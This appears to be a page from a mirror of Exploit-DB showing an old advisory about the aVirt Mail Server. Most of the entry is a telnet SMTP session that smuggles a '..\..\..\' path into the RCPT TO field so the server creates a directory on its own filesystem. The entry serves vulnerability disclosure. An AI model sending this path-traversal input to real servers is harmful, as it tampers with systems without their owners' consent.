bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/19589.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
763 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/764/info
The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient , an attacker could cause the mail server to create a directory in the server's local filesystem.
telnet targethost:25
> 220 server aVirt Mail SMTP Server Ready.
MAIL FROM: user
> 250 user, Sender OK
rcpt to:..\..\..\..\createdir
> 250 ..\..\..\..\createdir, Recipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
blablabla
.
> 250 Mail accepted.
This will cause the mail server to create a root directory called "createdir", which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders.
Reference in a new issue View git blame Copy permalink